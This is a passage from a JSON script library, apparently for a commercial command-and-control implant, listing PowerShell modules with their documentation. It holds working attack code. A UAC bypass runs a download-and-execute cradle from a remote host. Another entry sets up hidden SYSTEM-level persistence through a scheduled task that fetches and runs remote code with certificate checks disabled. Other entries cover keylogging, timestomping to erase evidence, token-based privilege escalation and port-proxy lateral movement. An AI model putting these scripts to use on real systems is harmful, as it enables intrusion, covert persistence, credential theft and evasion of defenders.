    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, ParameterSetName = 'Mirror', HelpMessage = \"A path to a file or directory to timestomp.\")]\r\n    [Parameter(Mandatory = $true, ParameterSetName = 'Explicit', HelpMessage = \"A path to a file or directory to timestomp.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$Path,\r\n\r\n    [Parameter(Mandatory = $true, ParameterSetName = 'Mirror', HelpMessage = \"Recursively timestomp all files and folders in the specified directory to include the top level directory.\")]\r\n    [Parameter(Mandatory = $true, ParameterSetName = 'Explicit', HelpMessage = \"Recursively timestomp all files and folders in the specified directory to include the top level directory.\")]\r\n    [bool]$Recurse = $false,\r\n    \r\n    [Parameter(Mandatory = $true, ParameterSetName = 'Mirror', HelpMessage = \"Move the file to synchronize NTFS timestamps with our stomped value.\")]\r\n    [Parameter(Mandatory = $true, ParameterSetName = 'Explicit', HelpMessage = \"Move the file to synchronize NTFS timestamps with our stomped value.\")]\r\n    [bool]$Sync = $false,\r\n\r\n    [Parameter(Mandatory = $true, ParameterSetName = 'Mirror', HelpMessage = \"A file or directory whose timestamps will be copied to the target file.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$Source = 'C:\\Windows\\explorer.exe',\r\n\r\n    [Parameter(Mandatory = $true, ParameterSetName = 'Explicit', HelpMessage = \"The exact time to change to.\")]\r\n    [DateTime]$Timestamp = [DateTime]::UtcNow\r\n)\r\n\r\nload common;\r\n\r\nif(![string]::IsNullOrEmpty($Source)) {\r\n\ttimestomp $Path -Source $Source -Recurse:$Recurse -Sync:$Sync\r\n} else {\r\n\ttimestomp $Path -TimeStamp $Timestamp -Recurse:$Recurse -Sync:$Sync\r\n}",
    "version": 9,
    "isPremium": true,
    "labels": [
      "api",
      "indicator-removal",
      "linux",
      "mac",
      "timestomp",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "d1fa75bb9a3f48ccb2e1c9eebd34bc84",
    "name": "Stop Netsh Portproxy via Commandline",
    "description": "Removes an existing netsh portproxy from the system.",
    "documentation": "# Overview\r\n\r\nUses netsh interface commands to remove portproxy configurations.\r\n\r\n# Dependencies\r\n\r\n* None",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The listening interface IP on the current  system.\")]\r\n    [string]$LHost = \"0.0.0.0\",\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The listening port on the current system.\")]\r\n    [int]$LPort = 45327\r\n)\r\n\r\nnetsh interface portproxy delete v4tov4 listenport=$LPort listenaddress=$LHost",
    "version": 3,
    "isPremium": true,
    "labels": [
      "command-line",
      "internal-proxy",
      "lateral-movement",
      "proxy",
      "windows",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "a5f493070cb1411d9e6f4abc8a73179d",
    "name": "Show Loaded Modules",
    "description": "Shows the modules loaded by the implant.",
    "documentation": "# Overview\r\n\r\nShows the modules loaded by the implant. This does not include every DLL loaded into the process, just the ones loaded via the \"load\" command.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n- Linux\r\n- Mac\r\n\r\n# Example Text\r\n\r\n```\r\nName                  Version\r\n----                  -------\r\nSpecterInsight        1.0.0.0\r\nInterop.TaskScheduler 1.0.0.0\r\ncommon                1.2.0.0\r\n```",
    "scriptBlock": "modules | select Name,Version",
    "version": 1,
    "isPremium": true,
    "labels": [
      "linux",
      "mac",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "3d2bedb85e18458ba0a5bb67aaf71756",
    "name": "Change Callback Interval",
    "description": "Change the callback interval and jitter for the session.",
    "documentation": "# Overview\r\n\r\nThis script will change the callback interval and jitter to the user specified values. The interval and jitter are TimeSpan objects where the default constructor takes in (hours,  inutes, seconds).\r\n\r\n# Example\r\n\r\nThis example changes the callback interval to 4 hours 20 minutes with a 1 hour 10 minute window after that, so the implant will call back between 4 hours and 20 minutes and 5 hours and 30 minutes from now.\r\n\r\n## Script\r\n\r\n```ps1\r\nSet-CallbackInterval -Interval (New-Object TimeSpan(4,20,0)) -Jitter (New-Object TimeSpan(1, 10, 0))\r\nGet-CallbackInterval\r\n```\r\n\r\n## Ouput Text\r\n\r\n```\r\nInterval Jitter\r\n-------- ------\r\n04:20:00 01:10:00\r\n```\r\n\r\n## Ouput JSON\r\n\r\n```json\r\n{\r\n  \"Interval\": \"04:20:00\",\r\n  \"Jitter\": \"01:10:00\"\r\n}\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $False, HelpMessage = \"The minimum time until the callback window in dd:hh:mm:ss or hh:mm:ss format.\")]\r\n    [TimeSpan]$Interval = '00:00:15',\r\n\r\n    [Parameter(Mandatory = $False, HelpMessage = \"The length of the callback window in dd:hh:mm:ss or hh:mm:ss format.\")]\r\n    [TimeSpan]$Window = '00:00:15'\r\n)\r\n\r\nSet-CallbackInterval -Interval $Interval -Jitter $Window;\r\nGet-CallbackInterval;",
    "version": 2,
    "isPremium": true,
    "labels": [],
    "enabled": true
  },
  {
    "identifier": "1a9e924f6d974e45be95cd358287d9a4",
    "name": "Get System Info via API",
    "description": "Gets key sytem information about the host.",
    "documentation": "# Overview\r\n\r\nThis script loads the recon module and runs the Get-SystemInfo cmdlet.\r\n\r\n# Example Output\r\n\r\n```\r\nHostname                : DESKTOP-LMCH70V\r\nDomain                  : \r\nProductName             : Windows 10 Pro\r\nEditionId               : Professional\r\nReleaseId               : 2009\r\nVersion                 : Microsoft Windows NT 6.2.9200.0\r\nArchitecture            : AMD64\r\nProcessorCount          : 4\r\nIsVirtualMachine        : True\r\nBootTimeUtc             : 9/2/2023 6:22:27 PM\r\nCurrentTimeUtc          : 9/2/2023 10:39:16 PM\r\nTimeZone                : Pacific Daylight Time\r\nTimeZoneUtcOffset       : -07:00:00\r\nLocale                  : en-US\r\nInputLanguage           : English (United States) (en-US)\r\nInstalledInputLanguages : {US}\r\n```",
    "scriptBlock": "load recon;\r\n\r\nsysinfo",
    "version": 1,
    "isPremium": true,
    "labels": [
      "api",
      "discovery",
      "host-discovery",
      "system-information-discovery",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "53aabc93b6034a0cbf8bb785fc88821c",
    "name": "Get Detailed Process Information",
    "description": "Get detailed information about all running processes such as the full path to the executable, commandline args, integrity level, and bitness.",
    "documentation": "# Overview\r\n\r\nGet detailed information about the current process including:\r\n\r\n- Commandline arguments\r\n- Process Integrity Level\r\n- Process Id\r\n- Parent Process Id\r\n- Name\r\n- Full path to the executable\r\n- Username and domain name (if applicable)\r\n- Bitness (either x86 or x64)\r\n\r\n# Dependencies\r\n\r\n- Common\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites\r\n\r\n- No pre-requisites for processes running under the same user context.\r\n- High Integrity process will be required to query information for other user processes.\r\n\r\n# Example Text\r\n\r\n```\r\nCommandLine    : \r\nIntegrityLevel : Unknown\r\nPID            : 0\r\nPPID           : 0\r\nName           : System Idle Process\r\nPath           : \r\nUsername       : NT AUTHORITY\\SYSTEM\r\nBitness        : Unknown\r\n\r\nCommandLine    : \r\nIntegrityLevel : Unknown\r\nPID            : 4\r\nPPID           : 0\r\nName           : \r\nPath           : \r\nUsername       : \r\nBitness        : x64\r\n\r\nCommandLine    : C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp\r\nIntegrityLevel : System\r\nPID            : 1652\r\nPPID           : 744\r\nName           : svchost.exe\r\nPath           : C:\\Windows\\System32\\svchost.exe\r\nUsername       : NT AUTHORITY\\LOCAL SERVICE\r\nBitness        : x64\r\n```\r\n\r\n# Example Json\r\n\r\n```json\r\n[\r\n  {\r\n    \"CommandLine\": \"\",\r\n    \"IntegrityLevel\": \"Unknown\",\r\n    \"PID\": 0,\r\n    \"PPID\": 0,\r\n    \"Name\": \"System Idle Process\",\r\n    \"Path\": \"\",\r\n    \"Username\": \"NT AUTHORITY\\\\SYSTEM\",\r\n    \"Bitness\": \"Unknown\"\r\n  },\r\n  {\r\n    \"CommandLine\": \"\",\r\n    \"IntegrityLevel\": \"Unknown\",\r\n    \"PID\": 4,\r\n    \"PPID\": 0,\r\n    \"Name\": \"\",\r\n    \"Path\": \"\",\r\n    \"Username\": \"\",\r\n    \"Bitness\": \"x64\"\r\n  },\r\n  {\r\n    \"CommandLine\": \"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp\",\r\n    \"IntegrityLevel\": \"System\",\r\n    \"PID\": 1652,\r\n    \"PPID\": 744,\r\n    \"Name\": \"svchost.exe\",\r\n    \"Path\": \"C:\\\\Windows\\\\System32\\\\svchost.exe\",\r\n    \"Username\": \"NT AUTHORITY\\\\LOCAL SERVICE\",\r\n    \"Bitness\": \"x64\"\r\n  }\r\n]\r\n```",
    "scriptBlock": "load common;\r\n\r\nSurvey-Processes -Detailed | Select PID,PPID,Architecture,IntegrityLevel,Username,Path,Name,CommandLine",
    "version": 2,
    "isPremium": true,
    "labels": [
      "api",
      "discovery",
      "host-discovery",
      "process-discovery",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "6b49a145713c46f683e6fdc88fe6f8bf",
    "name": "Stop Keylogger",
    "description": "Stops capturing keystrokes.",
    "documentation": "# Overview\r\n\r\nStops capturing keystrokes. The internal buffer will still contain captured keys.\r\n\r\n# Dependencies\r\n\r\n* Credentials",
    "scriptBlock": "load credentials;\r\n\r\nStop-Keylogger;",
    "version": 3,
    "isPremium": true,
    "labels": [
      "api",
      "input-capture",
      "keylogging",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "1ee25f4dbbc04ec8b43d6a56137d678e",
    "name": "User Access Control (UAC)  Bypass",
    "description": "Spawns a high integrity cprocess from an medium integrity process to run commands or PowerShell scripts that require high integrity without having to use the GUI.",
    "documentation": "# Overview\r\n\r\nSpawns a high integrity process from an medium integrity process without having to use the GUI. There are currently five techniques that are provided out-of-the-box. The table below outlines key information about each technique. There is a minimum and maximum supported Windows version for each technique. By default, the Invoke-UacBypass cmdlet will throw an exception if the current Windows version is not within the ranges below, but this can be overriden with the -Force parameter.\r\n\r\n|Name|Detected|MinVer|MaxVer|Description|\r\n|----|--------|------|------|-----------|\r\n|EventVwr|True|6.1.7600|10.0.1503|Modifies registry to start a child process of EventVwr which auto-elevates to a high integrity process.|\r\n|Sdclt|True|10.0.14393|11.0.0|Modifies the registry to start a child process of Sdclt which auto-elevates to a high integrity process.|\r\n|Slui|True|6.3.9600|10.0.1904|Modifies the registry to start a child process of Slui which auto-elevates to a high integrity process.|\r\n|TokenDuplication|True|6.1.7600|10.0.17686|Modifies the registry to start a child process of Sdclt which auto-elevates to a high integrity process.|\r\n|FodHelper|False|10.0.10240|11.0.0|Modifies the registry to start a child process of Sdclt which auto-elevates to a high integrity process.|\r\n\r\n# Dependencies\r\n\r\n- credentials\r\n\r\n# Pre-Requisites\r\n\r\n- User is Administrator\r\n\r\n# Example - Command\r\n\r\nThis example will use the first UAC bypass that will work on the target system. The specified executable will be launched in a high integrity process.\r\n\r\n```ps1\r\nInvoke-UacBypass -Command \"Fullpath.exe\"\r\n```\r\n\r\n# Example - PowerShell Script\r\n\r\nThis example will use the first UAC bypass that will work on the target system. The user provided PowerShell script will be executed by the spawned high integrity PowerShell process. The command will be passed via an environment variable to reduce the OPSEC footprint.\r\n\r\n```ps1\r\nInvoke-UacBypass -Script 'iex (New-Object System.Net.WebClient).DownloadString(\"http://10.10.10.10/PowerUp.ps1\")'\r\n```",
    "scriptBlock": "load credentials;\r\n\r\nInvoke-UacBypass -Script 'iex (New-Object System.Net.WebClient).DownloadString(\"http://10.10.10.10/PowerUp.ps1\")'",
    "version": 1,
    "isPremium": true,
    "labels": [
      "defense-evasion",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "cb6ec5ba4c2f48e8a9a0534561759079",
    "name": "Get Priviledge Escalation Vulnerabilities",
    "description": "Looks for common privilege escalation vulnerabilities.",
    "documentation": "# Overview\r\n\r\nLooks for locations or vulnerabilities for running from standard user to elevated user. It currently looks for modifiable services and service binaries.\r\n \r\n# Dependencies\r\n\r\n- credentials\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example\r\n\r\n```ps1\r\nSurvey-PrivilegeEscalation\r\n```\r\n\r\nOutput:\r\n\r\n```\r\nServiceName : AWSConfiguration\r\nPath        : \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\"\r\nState       : Stopped\r\nStartMode   : Auto\r\nUser        : LocalSystem\r\nAccess      : SERVICE_ALL_ACCESS\r\n```",
    "scriptBlock": "load credentials;\r\n\r\nSurvey-PrivilegeEscalation",
    "version": 1,
    "isPremium": true,
    "labels": [
      "privilege-escalation",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "6608d6647c7b4fde8403bc441e0a4959",
    "name": "Create Netsh Port Proxy via Commandline",
    "description": "Runs netsh interface portproxy command to create a TCP redirector.",
    "documentation": "# Overview\r\n\r\nCreates a TCP redirector using netsh commands.\r\n\r\n# Dependencies\r\n\r\n* None\r\n\r\n# Prerequisites\r\n\r\n- Requires a high integrity process.",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The listening interface IP on the current  system.\")]\r\n    [string]$LHost = \"0.0.0.0\",\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The listening port on the current system.\")]\r\n    [int]$LPort = 45327,\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The destination host to proxy connections to.\")]\r\n    [string]$RHost,\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The destination port to proxy connections to.\")]\r\n    [int]$RPort = 3389\r\n)\r\n\r\nnetsh interface portproxy add v4tov4 listenport=$LPort listenaddress=$LHost connectport=$RPort connectaddress=$RHost",
    "version": 5,
    "isPremium": true,
    "labels": [
      "command-line",
      "internal-proxy",
      "lateral-movement",
      "proxy",
      "windows",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "66ba70c3e9684217bbb397d7845c9e45",
    "name": "Stop TCP Redirector via API",
    "description": "Stops an active TCP listener in the current process.",
    "documentation": "# Overview\r\n\r\nThis script stops a TCP redirector in the current process using API calls.\r\n\r\n# Dependencies\r\n\r\n* lateral",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The listening port on the current system used by an active TCP redirector.\")]\r\n    [int]$LPort = 45327\r\n)\r\n\r\nload lateral;\r\n\r\n$redirector = Get-TcpRedirector | ? { $_.LocalPort -eq $LPort }\r\n$redirector | Stop-TcpRedirector",
    "version": 3,
    "isPremium": true,
    "labels": [
      "api",
      "internal-proxy",
      "lateral-movement",
      "linux",
      "mac",
      "proxy",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "032b8f7d9c47439bbb7adff2321c669d",
    "name": "Terminate Session",
    "description": "This script stops or terminates the current session.",
    "documentation": "# Overview\r\n\r\nThis script calls the burnoff cmdlet which triggers the implant to shutdown.\r\n\r\n# Dependencies\r\n\r\n* None",
    "scriptBlock": "burnoff",
    "version": 1,
    "isPremium": true,
    "labels": [],
    "enabled": true
  },
  {
    "identifier": "e96b5ec570fb41e28cf48b3798e9cd45",
    "name": "Get TCP Redirectors via API",
    "description": "Gets a list of active TCP listener in the current process.",
    "documentation": "# Overview\r\n\r\nThis script gets a list of TCP redirectors in the current process using API calls\r\n# Dependencies\r\n\r\n* lateral\r\n\r\n# Example Text Output\r\n\r\nExample of redirector output.\r\n\r\n```\r\nLocalHost LocalPort RemoteHost    RemotePort IsRunning\r\n--------- --------- ----------    ---------- ---------\r\n0.0.0.0        5000 192.168.1.103       3389      True\r\n```",
    "scriptBlock": "load lateral;\r\n\r\nGet-TcpRedirector;",
    "version": 1,
    "isPremium": true,
    "labels": [
      "api",
      "internal-proxy",
      "lateral-movement",
      "proxy"
    ],
    "enabled": true
  },
  {
    "identifier": "5167b86f843e4b2e980abf860626c44a",
    "name": "Get Startup Commands",
    "description": "Lists properties of each autostart.",
    "documentation": "# Overview\r\n\r\nLists properties for autostart commands in both the user and system registry run keys.\r\n\r\n# Example Output\r\n\r\n```\r\nName     : OneDriveSetup\r\nCaption  : OneDriveSetup\r\nCommand  : C:\\Windows\\SysWOW64\\OneDriveSetup.exe /thfirstsetup\r\nLocation : HKU\\S-1-5-19\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nUser     : NT AUTHORITY\\LOCAL SERVICE\r\nUserSID  : S-1-5-19\r\n```",
    "scriptBlock": "Get-CimInstance Win32_StartupCommand -EA 0 | Select-Object Name, Caption, Command, Location, User, UserSID",
    "version": 1,
    "isPremium": true,
    "labels": [],
    "enabled": true
  },
  {
    "identifier": "b65cb8082d9441889e0ee71be2cc80a3",
    "name": "Get Most Recently Modified Microsoft Office Files",
    "description": "Searches for all Microsoft Office files, sorts them by most recent, and then returns a few properties.",
    "documentation": "# Overview\r\n\r\nRecursively searches for all Microsoft Office files in the C:\\Users\\ directory, sorts them by most recent, and then returns LastWriteTime, Length, and FullName.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n- Linux\r\n- Mac\r\n\r\n# Example Output\r\n\r\n```\r\nLastWriteTime         Length FullName\r\n-------------         ------ --------\r\n7/19/2023 11:29:46 PM  93330 C:\\Users\\helpdesk\\Desktop\\Workspace\\repos\\SpecterInsight\\documents\\diagrams.pptx\r\n7/19/2023 11:29:46 PM  93330 C:\\Users\\helpdesk\\Desktop\\Workspace\\repos\\SpecterInsightSrc\\documents\\diagrams.pptx\r\n4/16/2014 4:47:33 PM   10577 C:\\Users\\helpdesk\\Dropbox\\Virus Total API Keys.xlsx\r\n```",
    "scriptBlock": "$files = gci \"C:\\Users\\*\" -Include @(\"*.doc\", \"*.docx\", \"*.xls\", \"*.xlsx\",\"*.ppt\", \"*.pptx\") -Recurse -ErrorAction SilentlyContinue;\r\n$files | Select LastWriteTime,Length,FullName",
    "version": 1,
    "isPremium": true,
    "labels": [
      "api",
      "discovery",
      "file-and-directory-discovery",
      "linux",
      "mac",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "1d0027ec23c844c0aa36019d7fd625d8",
    "name": "System Persistence with Scheduled Task Commandline and PowerShell Cradle",
    "description": "Installs persistence by creating a scheduled task to run a PowerShell cradle on startup.",
    "documentation": "# Overview\r\n\r\nInstalls persistence by creating a scheduled task to run a PowerShell cradle on startup as NT AUTHORITY\\SYSTEM using schtasks.exe. The cradle is stored in a System environment variable to mitigate detection. The scheduled task is configured to execute the contents of the specified system environment variable. This script requires a high integrity process.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites\r\n\r\n- High Integrity process\r\n\r\n# Example Output\r\n\r\n```json\r\n[\r\n  {\r\n    \"Persistence\": {\r\n      \"Id\": \"5a6fa3623aa744bd933f6ba168b0ca13\",\r\n      \"Method\": \"Scheduled Task\",\r\n      \"Trigger\": \"OnStartup\",\r\n      \"Build\": \"92cbf1b0f92642859f28f258226cc1f3\",\r\n      \"Profile\": \"System\",\r\n      \"Event\": \"Create\",\r\n      \"Success\": true,\r\n      \"UninstallScript\": \"$output = (schtasks /DELETE /TN 'CacheTask' /F) -join ([System.Environment]::NewLine);\\r\\n$success = $output -like 'success';\\r\\ntry {\\r\\n\\t[Environment]::SetEnvironmentVariable('GPO_AUX', $null, 'Machine');\\r\\n} catch {\\r\\n\\t$success = $false;\\r\\n\\tthrow;\\r\\n}\\r\\n\\r\\nNew-Object PSObject -Property @{\\r\\n\\tPersistence = New-Object PSObject -Property @{\\r\\n\\t\\tId = \\\"5a6fa3623aa744bd933f6ba168b0ca13\\\";\\r\\n\\t\\tEvent = \\\"Delete\\\";\\r\\n\\t\\tSuccess = $success;\\r\\n\\t    Method = \\\"Scheduled Task\\\";\\r\\n\\t    Profile = \\\"System\\\";\\r\\n\\t    Trigger = \\\"OnStartup\\\";\\r\\n\\t}\\r\\n}\",\r\n      \"TaskName\": \"CacheTask\",\r\n      \"EnvironmentVariableName\": \"GPO_AUX\"\r\n    }\r\n  }\r\n]\r\n```\r\n\r\n# Example Uninstall Script\r\n\r\nThis script generates an uninstall script that removes the persistence mechanism.\r\n\r\n```ps1\r\n$output = (schtasks /DELETE /TN 'CacheTask' /F) -join ([System.Environment]::NewLine);\r\n$success = $output -like 'success';\r\ntry {\r\n\t[Environment]::SetEnvironmentVariable('GPO_AUX', $null, 'Machine');\r\n} catch {\r\n\t$success = $false;\r\n\tthrow;\r\n}\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = \"5a6fa3623aa744bd933f6ba168b0ca13\";\r\n\t\tEvent = \"Delete\";\r\n\t\tSuccess = $success;\r\n\t    Method = \"Scheduled Task\";\r\n\t    Profile = \"System\";\r\n\t    Trigger = \"OnStartup\";\r\n\t}\r\n}\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of the scheduled task.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$TaskName = 'CacheTask',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of an environment variable that will store the PowerShell cradle.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$EnvironmentVariableName = 'GPO_AUX',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [Build]\r\n    [string]$Build\r\n)\r\n\r\ntry {\r\n\t#Get the URLs for the cradle generator\r\n\t$urls = (payload -Build $Build -Kind 'ps_url' | % { \"'$_'\" }) -Join \", \";\r\n\t$task = \"[Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true}; `$urls = @($urls); foreach(`$url in `$urls) { try { `$a = (New-Object Net.WebClient).DownloadString(`$url); iex `$a; } catch { } }\";\r\n\t[Environment]::SetEnvironmentVariable($EnvironmentVariableName, $task, \"Machine\")\r\n\t$output = (schtasks /CREATE /SC ONSTART /RU SYSTEM /TN $TaskName /TR \"powershell.exe -WindowStyle hidden -NonInt -ep bypass -nop -c \\`\"iex ([System.Environment]::GetEnvironmentVariable(\\\\\\`\"$EnvironmentVariableName\\\\\\`\", \\\\\\`\"Machine\\\\\\`\"))\\`\"\" /F) -join ([Environment]::NewLine);\r\n\t$success = $output -like '*success*';\r\n} catch {\r\n\t$success = $false;\r\n\tthrow;\r\n}\r\n\r\n#Generate a persistence ID\r\n$id = [Guid]::NewGuid().ToString().Replace(\"-\", \"\");\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = $id;\r\n\t\tEvent = \"Create\";\r\n\t\tSuccess = $success;\r\n\t    Method = \"Scheduled Task\";\r\n\t    Profile = \"System\";\r\n\t    Trigger = \"OnStartup\";\r\n\t    TaskName = $TaskName;\r\n\t    EnvironmentVariableName = $EnvironmentVariableName;\r\n\t    Build = $Build;\r\n\t    UninstallScript = @\"\r\n`$output = (schtasks /DELETE /TN '$TaskName' /F) -join ([System.Environment]::NewLine);\r\n`$success = `$output -like '*success*';\r\ntry {\r\n\t[Environment]::SetEnvironmentVariable('$EnvironmentVariableName', `$null, 'Machine');\r\n} catch {\r\n\t`$success = `$false;\r\n\tthrow;\r\n}\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = \"$id\";\r\n\t\tEvent = \"Delete\";\r\n\t\tSuccess = `$success;\r\n\t    Method = \"Scheduled Task\";\r\n\t    Profile = \"System\";\r\n\t    Trigger = \"OnStartup\";\r\n\t}\r\n}\r\n\"@;\r\n\t}\r\n}",
    "version": 5,
    "isPremium": true,
    "labels": [
      "command-and-scripting-interpreter",
      "command-line",
      "persistence",
      "powershell",
      "scheduled-task",
      "windows",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "e0bd41a41bfa443eaf0c1bcadb3db8a0",
    "name": "Start TCP Redirector via API",
    "description": "Creates a TCP listener in the current process that proxies any connections to the local port to the remote IP and port.",
    "documentation": "# Overview\r\n\r\nThis script creates a TCP redirector on the specified LHost and LPort and waits for new connections. For each new connection, the redirector will establish a new TCP connection to the specified RHost and RPort. It will the redirect traffic to and from both the incomning and outgoing connections to each other, essentially creating a proxy.\r\n\r\n# Dependencies\r\n\r\n* lateral\r\n\r\n# Limitations\r\n\r\n* The Windows Firewall will prevent connections to the localhost that are below port 5000.\r\n\r\n# Example Text Output\r\n\r\nExample of successful redirector setup.\r\n\r\n```\r\nLocalHost LocalPort RemoteHost    RemotePort IsRunning\r\n--------- --------- ----------    ---------- ---------\r\n0.0.0.0        5000 192.168.1.103       3389      True\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The listening interface IP on the current  system.\")]\r\n    [string]$LHost = \"0.0.0.0\",\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The listening port on the current system.\")]\r\n    [int]$LPort = 45327,\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The destination host to proxy connections to.\")]\r\n    [string]$RHost,\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The destination port to proxy connections to.\")]\r\n    [int]$RPort = 3389\r\n)\r\n\r\nload lateral;\r\n\r\nStart-TcpRedirector -LHost $LHost -LPort $LPort -RHost $RHost -RPort $RPort;",
    "version": 3,
    "isPremium": true,
    "labels": [
      "api",
      "internal-proxy",
      "lateral-movement",
      "proxy"
    ],
    "enabled": true
  },
  {
    "identifier": "799bd3c15ce74aa384f3ebe1df18f3dd",
    "name": "Get TCP Connections via API",
    "description": "Retrieves basic information about the active TCP connections.",
    "documentation": "# Overview\r\n\r\nThis script retieves the following information for each TCP connection:\r\n- State\r\n- Source IP\r\n- Source Port\r\n- Destination IP\r\n- Destination Port\r\n\r\n# Dependencies\r\n\r\n- recon\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n- Linux\r\n- Mac\r\n\r\n# Example Output\r\n\r\n```\r\nlocal_ip    : 10.0.0.15\r\nstate       : Established\r\nremote_ip   : 10.0.0.3\r\nremote_port : 49532\r\nlocal_port  : 3389\r\n\r\nlocal_ip    : 10.0.0.15\r\nstate       : Established\r\nremote_ip   : 34.117.65.55\r\nremote_port : 443\r\nlocal_port  : 53621\r\n```",
    "scriptBlock": "load recon;\r\n\r\n$connections = Get-TcpConnections\r\nforeach($connection in $connections) {\r\n\tNew-Object PSObject -Property @{\r\n\t\t'local_ip' = $connection.LocalEndPoint.Address;\r\n\t\t'local_port' = $connection.LocalEndPoint.Port;\r\n\t\t'remote_ip' = $connection.RemoteEndPoint.Address;\r\n\t\t'remote_port' = $connection.RemoteEndPoint.Port;\r\n\t\t'state' = $connection.State;\r\n\t}\r\n}",
    "version": 1,
    "isPremium": true,
    "labels": [
      "api",
      "discovery",
      "network-discovery",
      "passive",
      "system-network-connections-discovery"
    ],
    "enabled": true
  },
  {
    "identifier": "fb03ae70a22f4800850cbbafc099ec88",
    "name": "Start Process with Token",
    "description": "Runs the user supplied command using the specified token.",
    "documentation": "# Overview\r\n\r\nThis script pulls a token from the TokenManager (e.g. SYSTEM) and uses that token to run a command.\r\n\r\n# Dependencies\r\n\r\n- credentials\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Text\r\n\r\n```\r\nCommandLine    : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Command \"whoami | Out-File C:\\Users\\helpdesk\\Desktop\\test.txt\"\r\nIntegrityLevel : System\r\nPID            : 7620\r\nPPID           : 14196\r\nName           : powershell.exe\r\nPath           : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUsername       : NT AUTHORITY\\SYSTEM\r\nBitness        : x64\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of the token to use to spawn the child process.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$TokenName = 'SYSTEM',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name or path to the executable to run.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$Filepath = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',\r\n\r\n    [Parameter(Mandatory = $false, HelpMessage = \"Commandline arguments to the process.\")]\r\n    [ValidateNotNull()]\r\n    [string]$Arguments = '-Command \"whoami | Out-File C:\\test.txt\"'\r\n)\r\n\r\nload credentials;\r\n\r\n$token = Get-Token -Name $TokenName\r\nStart-ProcessWithToken -Token $token -Filepath $Filepath -Arguments $Arguments",
    "version": 2,
    "isPremium": true,
    "labels": [
      "command-line",
      "privilege-escalation",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "90c4c5fab8b9444195f3604387598a46",
    "name": "Background Screenshots",
    "description": "Takes multiple screenshots at the specified interval for the given duration and the exfils all of them.",
